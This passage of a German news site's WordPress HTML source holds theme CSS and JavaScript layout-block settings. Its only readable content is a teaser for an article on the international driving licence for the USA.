a{color:#ffffff;box-shadow:inset 0 0 0 0 #000}.tdi_97 .td_module_wrap:hover .td-module-title a{color:rgba(255,255,255,0.8)}.tdi_97 .td-post-author-name a{color:#000000}html:not([class*='ie']) .tdi_97 .td-module-container:hover .entry-thumb:before{opacity:0}.tdi_97 .td-read-more:hover a{background-color:rgba(255,255,255,0)!important}@media (min-width:768px){.tdi_97 .td-module-title a{transition:all 0.2s ease;-webkit-transition:all 0.2s ease}}@media (min-width:1019px) and (max-width:1140px){.tdi_97 .td-module-thumb{height:540px}.tdi_97 .td-module-meta-info{padding:0 20px 20px}.tdi_97 .entry-title{margin:12px 0 10px 0;font-size:30px!important}.tdi_97 .td-module-exclusive .td-module-title a:before{font-size:12px!important}.tdi_97 .td-post-category{font-size:12px!important}.tdi_97 .td-excerpt{font-size:15px!important}.tdi_97 .td-module-title a{box-shadow:inset 0 0 0 0 #000}@media (min-width:768px){.tdi_97 .td-module-title a{transition:all 0.2s ease;-webkit-transition:all 0.2s ease}}}@media (min-width:768px) and (max-width:1018px){.tdi_97 .td-module-thumb{height:460px}.tdi_97 .td-post-category{padding:4px 6px;font-size:12px!important}.tdi_97 .td-module-meta-info{padding:0 15px 15px}.tdi_97 .entry-title{margin:10px 0 6px 0;font-size:20px!important;line-height:1.1!important}.tdi_97 .td-module-exclusive .td-module-title a:before{font-size:12px!important}.tdi_97 .td-excerpt{font-size:14px!important}.tdi_97 .td-module-title a{box-shadow:inset 0 0 0 0 #000}@media (min-width:768px){.tdi_97 .td-module-title a{transition:all 0.2s ease;-webkit-transition:all 0.2s ease}}}@media (max-width:767px){.tdi_97 .td-module-thumb{height:500px}.tdi_97 .td-module-meta-info{max-width:100%;padding:0 20px 20px}.tdi_97 .entry-title{margin:12px 0 10px 0;font-size:30px!important}.tdi_97 .td-module-exclusive .td-module-title a:before{font-size:11px!important}.tdi_97 .td-post-category{font-size:12px!important}.tdi_97 .td-excerpt{font-size:15px!important}.tdi_97 .td-module-title a{box-shadow:inset 0 0 0 0 #000}@media (min-width:768px){.tdi_97 .td-module-title a{transition:all 0.2s ease;-webkit-transition:all 0.2s ease}}}</style><script type="rocketlazyloadscript">var block_tdi_97 = new tdBlock();
  1001. block_tdi_97.id = "tdi_97";
  1002. block_tdi_97.atts = '{"modules_on_row":"","limit":"1","modules_category":"above","show_btn":"none","show_excerpt":"","ajax_pagination":"","td_ajax_preloading":"","sort":"","category_id":"","f_title_font_size":"eyJhbGwiOiI0MCIsInBvcnRyYWl0IjoiMjAiLCJsYW5kc2NhcGUiOiIzMCIsInBob25lIjoiMzAifQ==","f_title_font_line_height":"eyJhbGwiOiIxIiwicG9ydHJhaXQiOiIxLjEifQ==","show_cat":"","meta_info_border_style":"","meta_padding":"eyJhbGwiOiIwIDI1cHggMjVweCIsImxhbmRzY2FwZSI6IjAgMjBweCAyMHB4IiwicG9ydHJhaXQiOiIwIDE1cHggMTVweCIsInBob25lIjoiMCAyMHB4IDIwcHgifQ==","modules_divider":"","image_size":"td_1068x0","meta_info_align":"bottom","image_floated":"","tdc_css":"eyJhbGwiOnsibWFyZ2luLWJvdHRvbSI6IjAiLCJkaXNwbGF5IjoiIn0sImxhbmRzY2FwZSI6eyJkaXNwbGF5IjoiIn0sImxhbmRzY2FwZV9tYXhfd2lkdGgiOjExNDAsImxhbmRzY2FwZV9taW5fd2lkdGgiOjEwMTksInBvcnRyYWl0Ijp7ImRpc3BsYXkiOiIifSwicG9ydHJhaXRfbWF4X3dpZHRoIjoxMDE4LCJwb3J0cmFpdF9taW5fd2lkdGgiOjc2OCwicGhvbmUiOnsiZGlzcGxheSI6IiJ9LCJwaG9uZV9tYXhfd2lkdGgiOjc2N30=","meta_info_horiz":"content-horiz-left","f_title_font_weight":"700","image_height":"eyJhbGwiOiIxMDAiLCJwb3J0cmFpdCI6IjE0MCJ9","all_modules_space":"0","art_excerpt":"0","art_title":"eyJhbGwiOiIxNnB4IDAgMTJweCAwIiwibGFuZHNjYXBlIjoiMTJweCAwIDEwcHggMCIsInBvcnRyYWl0IjoiMTBweCAwIDZweCAwIiwicGhvbmUiOiIxMnB4IDAgMTBweCAwIn0=","btn_bg":"rgba(255,255,255,0)","f_btn_font_transform":"uppercase","f_btn_font_weight":"","f_ex_font_weight":"500","f_cat_font_transform":"uppercase","f_cat_font_weight":"600","btn_bg_hover":"rgba(255,255,255,0)","f_ex_font_size":"eyJhbGwiOiIxNiIsInBvcnRyYWl0IjoiMTQiLCJsYW5kc2NhcGUiOiIxNSIsInBob25lIjoiMTUifQ==","f_ex_font_line_height":"1.4","meta_width":"eyJwaG9uZSI6IjEwMCUifQ==","show_audio":"","show_com":"none","show_date":"none","show_author":"none","mc1_el":"10","f_title_font_family":"653","f_title_font_transform":"","f_ex_font_family":"653","title_txt":"#ffffff","title_txt_hover":"rgba(255,255,255,0.8)","ex_txt":"#ffffff","cat_txt":"#ffffff","cat_bg":"#ec3535","cat_bg_hover":"#000000","author_txt":"#000000","modules_category_padding":"eyJhbGwiOiI1cHggOHB4IiwicG9ydHJhaXQiOiI0cHggNnB4In0=","f_cat_font_family":"653","f_cat_font_size":"eyJhbGwiOiIxMyIsInBvcnRyYWl0IjoiMTIiLCJsYW5kc2NhcGUiOiIxMiIsInBob25lIjoiMTIifQ==","f_cat_font_line_height":"1","excerpt_middle":"yes","cat_txt_hover":"#ffffff","modules_gap":"0","modules_space":"0","modules_height":"eyJhbGwiOiI2MDAiLCJsYW5kc2NhcGUiOiI1NDAiLCJwb3J0cmFpdCI6IjQ2MCIsInBob25lIjoiNTAwIn0=","image_margin":"0","offset":"6","color_overlay":"eyJ0eXBlIjoiZ3JhZGllbnQiLCJjb2xvcjEiOiJyZ2JhKDAsMCwwLDApIiwiY29sb3IyIjoicmdiYSgwLDAsMCwwLjgpIiwibWl4ZWRDb2xvcnMiOlt7ImNvbG9yIjoicmdiYSgwLDAsMCwwLjUpIiwicGVyY2VudGFnZSI6NDJ9LHsiY29sb3IiOiJyZ2JhKDAsMCwwLDApIiwicGVyY2VudGFnZSI6NjF9XSwiZGVncmVlIjoiMCIsImNzcyI6ImJhY2tncm91bmQ6IC13ZWJraXQtbGluZWFyLWdyYWRpZW50KDBkZWcscmdiYSgwLDAsMCwwLjgpLHJnYmEoMCwwLDAsMC41KSA0MiUscmdiYSgwLDAsMCwwKSA2MSUscmdiYSgwLDAsMCwwKSk7YmFja2dyb3VuZDogbGluZWFyLWdyYWRpZW50KDBkZWcscmdiYSgwLDAsMCwwLjgpLHJnYmEoMCwwLDAsMC41KSA0MiUscmdiYSgwLDAsMCwwKSA2MSUscmdiYSgwLDAsMCwwKSk7IiwiY3NzUGFyYW1zIjoiMGRlZyxyZ2JhKDAsMCwwLDAuOCkscmdiYSgwLDAsMCwwLjUpIDQyJSxyZ2JhKDAsMCwwLDApIDYxJSxyZ2JhKDAsMCwwLDApIn0=","mc2_el":"26","modules_category_radius":"2","excl_padd":"5px 8px","excl_radius":"2","excl_color":"#ffffff","excl_color_h":"#ffffff","excl_bg":"#ec3535","excl_bg_h":"#ec3535","f_excl_font_transform":"uppercase","f_excl_font_weight":"600","f_excl_font_family":"653","f_excl_font_size":"eyJhbGwiOiIxMyIsInBvcnRyYWl0IjoiMTIiLCJsYW5kc2NhcGUiOiIxMiIsInBob25lIjoiMTEifQ==","f_excl_font_line_height":"1","block_type":"td_flex_block_2","separator":"","custom_title":"","custom_url":"","block_template_id":"","title_tag":"","mc2_tl":"","mc2_title_tag":"","post_ids":"","taxonomies":"","category_ids":"","in_all_terms":"","tag_slug":"","autors_id":"","installed_post_types":"","include_cf_posts":"","exclude_cf_posts":"","linked_posts":"","favourite_only":"","locked_only":"","open_in_new_window":"","show_modified_date":"","time_ago":"","time_ago_add_txt":"ago","time_ago_txt_pos":"","review_source":"","el_class":"","td_query_cache":"","td_query_cache_expiration":"","td_ajax_filter_type":"","td_ajax_filter_ids":"","td_filter_default_txt":"All","block_title_over":"","block_title_space":"","image_alignment":"50","image_radius":"","image_margin_right":"","image_margin_forced":"","show_favourites":"","fav_size":"2","fav_space":"","fav_ico_color":"","fav_ico_color_h":"","fav_bg":"","fav_bg_h":"","fav_shadow_shadow_header":"","fav_shadow_shadow_title":"Shadow","fav_shadow_shadow_size":"","fav_shadow_shadow_offset_horizontal":"","fav_shadow_shadow_offset_vertical":"","fav_shadow_shadow_spread":"","fav_shadow_shadow_color":"","video_icon":"","video_icon_pos":"center","video_popup":"yes","video_rec":"","spot_header":"","video_rec_title":"","video_rec_color":"","video_rec_disable":"","autoplay_vid":"","show_vid_t":"inline-block","vid_t_margin":"","vid_t_padding":"","video_title_color":"","video_title_color_h":"","video_bg":"","video_overlay":"","vid_t_color":"","vid_t_bg_color":"","f_vid_title_font_header":"","f_vid_title_font_title":"Video pop-up article title","f_vid_title_font_settings":"","f_vid_title_font_family":"","f_vid_title_font_size":"","f_vid_title_font_line_height":"","f_vid_title_font_style":"","f_vid_title_font_weight":"","f_vid_title_font_transform":"","f_vid_title_font_spacing":"","f_vid_title_":"","f_vid_time_font_title":"Video duration text","f_vid_time_font_settings":"","f_vid_time_font_family":"","f_vid_time_font_size":"","f_vid_time_font_line_height":"","f_vid_time_font_style":"","f_vid_time_font_weight":"","f_vid_time_font_transform":"","f_vid_time_font_spacing":"","f_vid_time_":"","excl_show":"inline-block","excl_txt":"","excl_margin":"","all_excl_border":"","all_excl_border_style":"solid","all_excl_border_color":"","excl_border_color_h":"","f_excl_font_header":"","f_excl_font_title":"Label text","f_excl_font_settings":"","f_excl_font_style":"","f_excl_font_spacing":"","f_excl_":"","meta_margin":"","meta_info_border_radius":"","modules_category_margin":"","modules_cat_border":"","modules_extra_cat":"","show_review":"inline-block","review_space":"","review_size":"2.5","review_distance":"","btn_title":"","btn_margin":"","btn_padding":"","btn_border_width":"","btn_radius":"","nextprev_position":"top","nextprev_split":"","nextprev":"","pag_padding":"","pag_border_width":"","pag_border_radius":"","prev_tdicon":"","next_tdicon":"","pag_icons_size":"","pag_icons_space":"","f_header_font_header":"","f_header_font_title":"Block header","f_header_font_settings":"","f_header_font_family":"","f_header_font_size":"","f_header_font_line_height":"","f_header_font_style":"","f_header_font_weight":"","f_header_font_transform":"","f_header_font_spacing":"","f_header_":"","f_ajax_font_title":"Ajax categories","f_ajax_font_settings":"","f_ajax_font_family":"","f_ajax_font_size":"","f_ajax_font_line_height":"","f_ajax_font_style":"","f_ajax_font_weight":"","f_ajax_font_transform":"","f_ajax_font_spacing":"","f_ajax_":"","f_more_font_title":"Load more button","f_more_font_settings":"","f_more_font_family":"","f_more_font_size":"","f_more_font_line_height":"","f_more_font_style":"","f_more_font_weight":"","f_more_font_transform":"","f_more_font_spacing":"","f_more_":"","f_title_font_header":"","f_title_font_title":"Article title","f_title_font_settings":"","f_title_font_style":"","f_title_font_spacing":"","f_title_":"","f_cat_font_title":"Article category tag","f_cat_font_settings":"","f_cat_font_style":"","f_cat_font_spacing":"","f_cat_":"","f_meta_font_title":"Article meta info","f_meta_font_settings":"","f_meta_font_family":"","f_meta_font_size":"","f_meta_font_line_height":"","f_meta_font_style":"","f_meta_font_weight":"","f_meta_font_transform":"","f_meta_font_spacing":"","f_meta_":"","f_ex_font_title":"Article excerpt","f_ex_font_settings":"","f_ex_font_style":"","f_ex_font_transform":"","f_ex_font_spacing":"","f_ex_":"","f_btn_font_title":"Article read more button","f_btn_font_settings":"","f_btn_font_family":"","f_btn_font_size":"","f_btn_font_line_height":"","f_btn_font_style":"","f_btn_font_spacing":"","f_btn_":"","mix_color":"","mix_type":"","fe_brightness":"1","fe_contrast":"1","fe_saturate":"1","mix_color_h":"","mix_type_h":"","fe_brightness_h":"1","fe_contrast_h":"1","fe_saturate_h":"1","meta_bg":"","nextprev_icon":"","nextprev_icon_h":"","nextprev_bg":"","nextprev_bg_h":"","all_underline_height":"","all_underline_color":"","cat_border":"","cat_border_hover":"","author_txt_hover":"","date_txt":"","com_txt":"","com_icon":"","rev_txt":"","btn_txt":"","btn_txt_hover":"","btn_border":"","btn_border_hover":"","ajax_pagination_next_prev_swipe":"","ajax_pagination_infinite_stop":"","css":"","td_column_number":1,"header_color":"","color_preset":"","border_top":"","class":"tdi_97","tdc_css_class":"tdi_97","tdc_css_class_style":"tdi_97_rand_style"}';
  1003. block_tdi_97.td_column_number = "1";
  1004. block_tdi_97.block_type = "td_flex_block_2";
  1005. block_tdi_97.post_count = "1";
  1006. block_tdi_97.found_posts = "3784";
  1007. block_tdi_97.header_color = "";
  1008. block_tdi_97.ajax_pagination_infinite_stop = "";
  1009. block_tdi_97.max_num_pages = "3778";
  1010. tdBlocksArray.push(block_tdi_97);
  1011. </script><div class="td-block-title-over"><div class="td-block-title-wrap"></div></div><div class="td-block-inner-pagination"><div id=tdi_97 class="td_block_inner td-mc2-wrap">
  1012.        <div class="td_module_flex_2 td_module_wrap td-animation-stack td-cpt-post">
  1013.            <div class="td-module-container">
  1014.                <div class="td-module-thumb"><a href="https://nachrichtenmorgen.de/internationale-fuehrerschein-fuer-die-usa/" rel="bookmark" class="td-image-wrap " title="Der internationale Führerschein für die USA: Ein unverzichtbares Dokument für deutsche Autofahrer"><span class="entry-thumb td-thumb-css" data-type="css_image" data-img-url="https://nachrichtenmorgen.de/wp-content/uploads/2024/04/Entdeckung-der-versunkenen-Schaetze-mit-dem-9-1-1068x600.jpg"  ></span></a></div>                
  1015.                <div class="td-module-meta-info">
  1016.                                        <a href="https://nachrichtenmorgen.de/category/reisen/" class="td-post-category">Reisen</a>
  1017.                    <h3 class="entry-title td-module-title"><a href="https://nachrichtenmorgen.de/internationale-fuehrerschein-fuer-die-usa/" rel="bookmark" title="Der internationale Führerschein für die USA: Ein unverzichtbares Dokument für deutsche Autofahrer">Der internationale Führerschein für die USA: Ein unverzichtbares Dokument für deutsche Autofahrer</a></h3>
  1018.                    <div class="td-excerpt">Wenn Sie planen, in den Vereinigten Staaten zu fahren, ist ein internationaler Führerschein neben Ihrem deutschen Führerschein ein Muss. Dieser Artikel erklärt, warum der internationale...</div>
  1019.                    
  1020.                    
  1021.                                    </div>
  1022.            </div>
  1023.        </div>
  1024.  
  1025.        </div></div></div></div></div><div class="vc_column tdi_99  wpb_column vc_column_container tdc-column td-pb-span3">
  1026. <style scoped>.tdi_99{vertical-align:baseline}.tdi_99>.wpb_wrapper,.tdi_99>.wpb_wrapper>.tdc-elements{display:block}.tdi_99>.wpb_wrapper>.tdc-elements{width:100%}.tdi_99>.wpb_wrapper>.vc_row_inner{width:auto}.tdi_99>.wpb_wrapper{width:auto;height:auto}.tdi_99{width:20%!important}@media (max-width:767px){.tdi_99{margin-bottom:40px!important;width:100%!important}}</style><div class="wpb_wrapper" ><div class="td_block_wrap td_flex_block_1 tdi_100 td-pb-border-top td_block_template_1 td_flex_block"  data-td-block-uid="tdi_100" >
  1027. <style>.tdi_100{margin-bottom:0px!important}@media (max-width:767px){.tdi_100{margin-bottom:0px!important}}</style>
  1028. <style>.tdi_100 .td-image-wrap{padding-bottom:72%}.tdi_100 .entry-thumb{background-position:center 50%}.tdi_100 .td-module-container{flex-direction:column;border-color:#eaeaea!important}.tdi_100 .td-image-container{display:block;order:0;margin-left:0;margin-right:auto}.ie10 .tdi_100 .td-module-meta-info,.ie11 .tdi_100 .td-module-meta-info{flex:auto}body .tdi_100 .td-favorite{font-size:36px;box-shadow:1px 1px 4px 0px rgba(0,0,0,0.2)}.tdi_100 .td-module-meta-info{padding:16px 30px 0 0;border-color:#eaeaea}.tdi_100 .td_module_wrap{padding-left:0px;padding-right:0px;padding-bottom:10px;margin-bottom:10px}.tdi_100 .td_block_inner{margin-left:-0px;margin-right:-0px}.tdi_100 .td-module-container:before{bottom:-10px;border-color:#eaeaea}.tdi_100 .td-post-vid-time{display:block}.tdi_100 .td-post-category{margin:0px;padding:0px;background-color:rgba(255,255,255,0);color:#000000;border-width:0px;border-style:solid;border-color:#aaa;font-family:Work Sans!important;font-size:13px!important;line-height:1!important;font-weight:600!important;text-transform:uppercase!important;letter-spacing:-0.5px!important}.tdi_100 .td-author-photo .avatar{width:20px;height:20px;margin-right:6px;border-radius:50%}.tdi_100 .td-excerpt{display:none;margin:0px;column-count:1;column-gap:48px}.tdi_100 .td-audio-player{opacity:1;visibility:visible;height:auto;font-size:13px}.tdi_100 .td-read-more{display:none}.tdi_100 .td-author-date{display:inline}.tdi_100 .td-post-author-name{display:none}.tdi_100 .td-post-date,.tdi_100 .td-post-author-name span{display:none}.tdi_100 .entry-review-stars{display:inline-block}.tdi_100 .td-icon-star,.tdi_100 .td-icon-star-empty,.tdi_100 .td-icon-star-half{font-size:15px}.tdi_100 .td-module-comments{display:none}.tdi_100 .td_module_wrap:nth-last-child(1){margin-bottom:0;padding-bottom:0}.tdi_100 .td_module_wrap:nth-last-child(1) .td-module-container:before{display:none}.tdi_100 .td-post-category:hover{background-color:rgba(255,255,255,0)!important;color:#ec3535}.tdi_100 .td-module-title a{color:#000000;box-shadow:inset 0 0 0 0 #000}.tdi_100 .td_module_wrap:hover .td-module-title a{color:#f43f3f!important}.tdi_100 .td-module-meta-info,.tdi_100 .td-next-prev-wrap{text-align:left}.tdi_100 .td-category-pos-above .td-post-category{align-self:flex-start!important}.tdi_100 .td-category-pos-image .td-post-category:not(.td-post-extra-category){left:0;right:auto;transform:translateX(0);-webkit-transform:translateX(0)}.tdi_100 .td-ajax-next-page{margin-right:auto;margin-left:0}.tdi_100 .td-module-exclusive .td-module-title a:before{display:inline-block;margin:-4px 5px 0 0;padding:3px 5px;border-radius:2px;color:#ffffff;background-color:#ec3535;font-family:Work Sans!important;font-size:12px!important;line-height:1!important;font-weight:500!important;text-transform:uppercase!important;letter-spacing:-0.5px!important}.tdi_100 .td-module-exclusive:hover .td-module-title a:before{color:#ffffff;background-color:#ec3535}.tdi_100 .entry-title{margin:8px 0 0 0;font-family:PT Serif!important;font-size:16px!important;line-height:1.3!important;font-weight:600!important}.tdi_100 .td-read-more a{background-color:rgba(255,255,255,0)!important;text-transform:uppercase!important}.tdi_100 .td-read-more:hover a{background-color:rgba(255,255,255,0)!important}html:not([class*='ie']) .tdi_100 .td-module-container:hover .entry-thumb:before{opacity:0}@media (min-width:768px){.tdi_100 .td-module-title a{transition:all 0.2s ease;-webkit-transition:all 0.2s ease}}@media (min-width:1019px) and (max-width:1140px){.tdi_100 .td-image-wrap{padding-bottom:85%}.tdi_100 .td-module-meta-info{padding:14px 0 0 0}.tdi_100 .td_module_wrap{padding-bottom:10px;margin-bottom:10px;padding-bottom:10px!important;margin-bottom:10px!important}.tdi_100 .td-module-container:before{bottom:-10px}.tdi_100 .td_module_wrap:nth-last-child(1){margin-bottom:0!important;padding-bottom:0!important}.tdi_100 .td_module_wrap .td-module-container:before{display:block!important}.tdi_100 .td_module_wrap:nth-last-child(1) .td-module-container:before{display:none!important}.tdi_100 .td-module-title a{box-shadow:inset 0 0 0 0 #000}.tdi_100 .td-module-exclusive .td-module-title a:before{font-size:11px!important}.tdi_100 .entry-title{margin:6px 0 0 0;font-size:14px!important}.tdi_100 .td-post-category{font-size:12px!important}@media (min-width:768px){.tdi_100 .td-module-title a{transition:all 0.2s ease;-webkit-transition:all 0.2s ease}}}@media (min-width:768px) and (max-width:1018px){.tdi_100 .td-image-wrap{padding-bottom:90%}.tdi_100 .td-module-meta-info{padding:12px 0 0 0}.tdi_100 .td_module_wrap{padding-bottom:8px;margin-bottom:8px;padding-bottom:8px!important;margin-bottom:8px!important}.tdi_100 .td-module-container:before{bottom:-8px}.tdi_100 .td_module_wrap:nth-last-child(1){margin-bottom:0!important;padding-bottom:0!important}.tdi_100 .td_module_wrap .td-module-container:before{display:block!important}.tdi_100 .td_module_wrap:nth-last-child(1) .td-module-container:before{display:none!important}.tdi_100 .td-module-title a{box-shadow:inset 0 0 0 0 #000}.tdi_100 .td-module-exclusive .td-module-title a:before{font-size:11px!important}.tdi_100 .entry-title{margin:4px 0 0 0;font-size:13px!important}@media (min-width:768px){.tdi_100 .td-module-title a{transition:all 0.2s ease;-webkit-transition:all 0.2s ease}}}@media (max-width:767px){.tdi_100 .td-module-meta-info{max-width:100%}.tdi_100 .td_module_wrap{padding-bottom:15px;margin-bottom:15px;padding-bottom:15px!important;margin-bottom:15px!important}.tdi_100 .td-module-container:before{bottom:-15px}.tdi_100 .td_module_wrap:nth-last-child(1){margin-bottom:0!important;padding-bottom:0!important}.tdi_100 .td_module_wrap .td-module-container:before{display:block!important}.tdi_100 .td_module_wrap:nth-last-child(1) .td-module-container:before{display:none!important}.tdi_100 .td-module-title a{box-shadow:inset 0 0 0 0 #000}.tdi_100 .td-module-exclusive .td-module-title a:before{font-size:11px!important}@media (min-width:768px){.tdi_100 .td-module-title a{transition:all 0.2s ease;-webkit-transition:all 0.2s ease}}}</style><script type="rocketlazyloadscript">var block_tdi_100 = new tdBlock();
  1029. block_tdi_100.id = "tdi_100";
  1030. block_tdi_100.atts = '{"modules_on_row":"","limit":"2","modules_category":"above","show_btn":"none","show_excerpt":"eyJwb3J0cmFpdCI6Im5vbmUiLCJhbGwiOiJub25lIn0=","ajax_pagination":"","td_ajax_preloading":"","sort":"","category_id":"","f_title_font_size":"eyJhbGwiOiIxNiIsInBvcnRyYWl0IjoiMTMiLCJsYW5kc2NhcGUiOiIxNCJ9","f_title_font_line_height":"1.3","show_cat":"","meta_info_border_style":"","meta_padding":"eyJhbGwiOiIxNnB4IDMwcHggMCAwIiwibGFuZHNjYXBlIjoiMTRweCAwIDAgMCIsInBvcnRyYWl0IjoiMTJweCAwIDAgMCJ9","modules_divider":"","image_size":"","meta_info_align":"","image_floated":"","tdc_css":"eyJhbGwiOnsibWFyZ2luLWJvdHRvbSI6IjAiLCJkaXNwbGF5IjoiIn0sImxhbmRzY2FwZSI6eyJkaXNwbGF5IjoiIn0sImxhbmRzY2FwZV9tYXhfd2lkdGgiOjExNDAsImxhbmRzY2FwZV9taW5fd2lkdGgiOjEwMTksInBvcnRyYWl0Ijp7ImRpc3BsYXkiOiIifSwicG9ydHJhaXRfbWF4X3dpZHRoIjoxMDE4LCJwb3J0cmFpdF9taW5fd2lkdGgiOjc2OCwicGhvbmUiOnsibWFyZ2luLWJvdHRvbSI6IjAiLCJkaXNwbGF5IjoiIn0sInBob25lX21heF93aWR0aCI6NzY3fQ==","meta_info_horiz":"content-horiz-left","f_title_font_weight":"600","image_height":"eyJhbGwiOiI3MiIsImxhbmRzY2FwZSI6Ijg1IiwicG9ydHJhaXQiOiI5MCJ9","all_modules_space":"eyJhbGwiOiIyMCIsInBob25lIjoiMzAiLCJwb3J0cmFpdCI6IjE2In0=","art_excerpt":"0","art_title":"eyJhbGwiOiI4cHggMCAwIDAiLCJsYW5kc2NhcGUiOiI2cHggMCAwIDAiLCJwb3J0cmFpdCI6IjRweCAwIDAgMCJ9","btn_bg":"rgba(255,255,255,0)","f_btn_font_transform":"uppercase","f_btn_font_weight":"","f_cat_font_transform":"uppercase","f_cat_font_weight":"600","btn_bg_hover":"rgba(255,255,255,0)","meta_width":"eyJwaG9uZSI6IjEwMCUifQ==","show_audio":"","show_com":"none","show_date":"none","show_author":"none","mc1_el":"10","f_title_font_family":"456","f_title_font_transform":"","title_txt":"#000000","title_txt_hover":"#f43f3f","cat_txt":"#000000","cat_bg":"rgba(255,255,255,0)","cat_bg_hover":"rgba(255,255,255,0)","modules_category_padding":"0","f_cat_font_family":"653","f_cat_font_size":"eyJhbGwiOiIxMyIsImxhbmRzY2FwZSI6IjEyIn0=","f_cat_font_line_height":"1","modules_gap":"0","modules_category_margin":"0","modules_cat_border":"0","f_cat_font_spacing":"-0.5","cat_txt_hover":"#ec3535","offset":"12","excl_padd":"3px 5px","excl_radius":"2","f_excl_font_family":"653","f_excl_font_transform":"uppercase","f_excl_font_size":"eyJhbGwiOiIxMiIsImxhbmRzY2FwZSI6IjExIiwicG9ydHJhaXQiOiIxMSIsInBob25lIjoiMTEifQ==","f_excl_font_weight":"500","f_excl_font_line_height":"1","f_excl_font_spacing":"-0.5","excl_color":"#ffffff","excl_color_h":"#ffffff","excl_bg":"#ec3535","excl_bg_h":"#ec3535","excl_margin":"-4px 5px 0 0","block_type":"td_flex_block_1","separator":"","custom_title":"","custom_url":"","block_template_id":"","title_tag":"","mc1_tl":"","mc1_title_tag":"","post_ids":"","taxonomies":"","category_ids":"","in_all_terms":"","tag_slug":"","autors_id":"","installed_post_types":"","include_cf_posts":"","exclude_cf_posts":"","linked_posts":"","favourite_only":"","locked_only":"","open_in_new_window":"","show_modified_date":"","time_ago":"","time_ago_add_txt":"ago","time_ago_txt_pos":"","review_source":"","el_class":"","td_query_cache":"","td_query_cache_expiration":"","td_ajax_filter_type":"","td_ajax_filter_ids":"","td_filter_default_txt":"All","container_width":"","m_padding":"","modules_border_size":"","modules_border_style":"","modules_border_color":"#eaeaea","modules_border_radius":"","modules_divider_color":"#eaeaea","h_effect":"","image_alignment":"50","image_width":"","image_radius":"","hide_image":"","show_favourites":"","fav_size":"2","fav_space":"","fav_ico_color":"","fav_ico_color_h":"","fav_bg":"","fav_bg_h":"","fav_shadow_shadow_header":"","fav_shadow_shadow_title":"Shadow","fav_shadow_shadow_size":"","fav_shadow_shadow_offset_horizontal":"","fav_shadow_shadow_offset_vertical":"","fav_shadow_shadow_spread":"","fav_shadow_shadow_color":"","video_icon":"","video_popup":"yes","video_rec":"","spot_header":"","video_rec_title":"","video_rec_color":"","video_rec_disable":"","autoplay_vid":"yes","show_vid_t":"block","vid_t_margin":"","vid_t_padding":"","video_title_color":"","video_title_color_h":"","video_bg":"","video_overlay":"","vid_t_color":"","vid_t_bg_color":"","f_vid_title_font_header":"","f_vid_title_font_title":"Video pop-up article title","f_vid_title_font_settings":"","f_vid_title_font_family":"","f_vid_title_font_size":"","f_vid_title_font_line_height":"","f_vid_title_font_style":"","f_vid_title_font_weight":"","f_vid_title_font_transform":"","f_vid_title_font_spacing":"","f_vid_title_":"","f_vid_time_font_title":"Video duration text","f_vid_time_font_settings":"","f_vid_time_font_family":"","f_vid_time_font_size":"","f_vid_time_font_line_height":"","f_vid_time_font_style":"","f_vid_time_font_weight":"","f_vid_time_font_transform":"","f_vid_time_font_spacing":"","f_vid_time_":"","excl_show":"inline-block","excl_txt":"","all_excl_border":"","all_excl_border_style":"solid","all_excl_border_color":"","excl_border_color_h":"","f_excl_font_header":"","f_excl_font_title":"Label text","f_excl_font_settings":"","f_excl_font_style":"","f_excl_":"","meta_margin":"","meta_space":"","art_btn":"","meta_info_border_size":"","meta_info_border_color":"#eaeaea","meta_info_border_radius":"","modules_category_radius":"0","modules_extra_cat":"","author_photo":"","author_photo_size":"","author_photo_space":"","author_photo_radius":"","show_review":"inline-block","review_space":"","review_size":"2.5","review_distance":"","excerpt_col":"1","excerpt_gap":"","excerpt_middle":"","excerpt_inline":"","hide_audio":"","art_audio":"","art_audio_size":"1.5","btn_title":"","btn_margin":"","btn_padding":"","btn_border_width":"","btn_radius":"","pag_space":"","pag_padding":"","pag_border_width":"","pag_border_radius":"","prev_tdicon":"","next_tdicon":"","pag_icons_size":"","f_header_font_header":"","f_header_font_title":"Block header","f_header_font_settings":"","f_header_font_family":"","f_header_font_size":"","f_header_font_line_height":"","f_header_font_style":"","f_header_font_weight":"","f_header_font_transform":"","f_header_font_spacing":"","f_header_":"","f_ajax_font_title":"Ajax categories","f_ajax_font_settings":"","f_ajax_font_family":"","f_ajax_font_size":"","f_ajax_font_line_height":"","f_ajax_font_style":"","f_ajax_font_weight":"","f_ajax_font_transform":"","f_ajax_font_spacing":"","f_ajax_":"","f_more_font_title":"Load more button","f_more_font_settings":"","f_more_font_family":"","f_more_font_size":"","f_more_font_line_height":"","f_more_font_style":"","f_more_font_weight":"","f_more_font_transform":"","f_more_font_spacing":"","f_more_":"","f_title_font_header":"","f_title_font_title":"Article title","f_title_font_settings":"","f_title_font_style":"","f_title_font_spacing":"","f_title_":"","f_cat_font_title":"Article category tag","f_cat_font_settings":"","f_cat_font_style":"","f_cat_":"","f_meta_font_title":"Article meta info","f_meta_font_settings":"","f_meta_font_family":"","f_meta_font_size":"","f_meta_font_line_height":"","f_meta_font_style":"","f_meta_font_weight":"","f_meta_font_transform":"","f_meta_font_spacing":"","f_meta_":"","f_ex_font_title":"Article excerpt","f_ex_font_settings":"","f_ex_font_family":"","f_ex_font_size":"","f_ex_font_line_height":"","f_ex_font_style":"","f_ex_font_weight":"","f_ex_font_transform":"","f_ex_font_spacing":"","f_ex_":"","f_btn_font_title":"Article read more button","f_btn_font_settings":"","f_btn_font_family":"","f_btn_font_size":"","f_btn_font_line_height":"","f_btn_font_style":"","f_btn_font_spacing":"","f_btn_":"","mix_color":"","mix_type":"","fe_brightness":"1","fe_contrast":"1","fe_saturate":"1","mix_color_h":"","mix_type_h":"","fe_brightness_h":"1","fe_contrast_h":"1","fe_saturate_h":"1","m_bg":"","color_overlay":"","shadow_shadow_header":"","shadow_shadow_title":"Module Shadow","shadow_shadow_size":"","shadow_shadow_offset_horizontal":"","shadow_shadow_offset_vertical":"","shadow_shadow_spread":"","shadow_shadow_color":"","all_underline_height":"","all_underline_color":"","cat_border":"","cat_border_hover":"","meta_bg":"","author_txt":"","author_txt_hover":"","date_txt":"","ex_txt":"","com_bg":"","com_txt":"","rev_txt":"","audio_btn_color":"","audio_time_color":"","audio_bar_color":"","audio_bar_curr_color":"","shadow_m_shadow_header":"","shadow_m_shadow_title":"Meta info 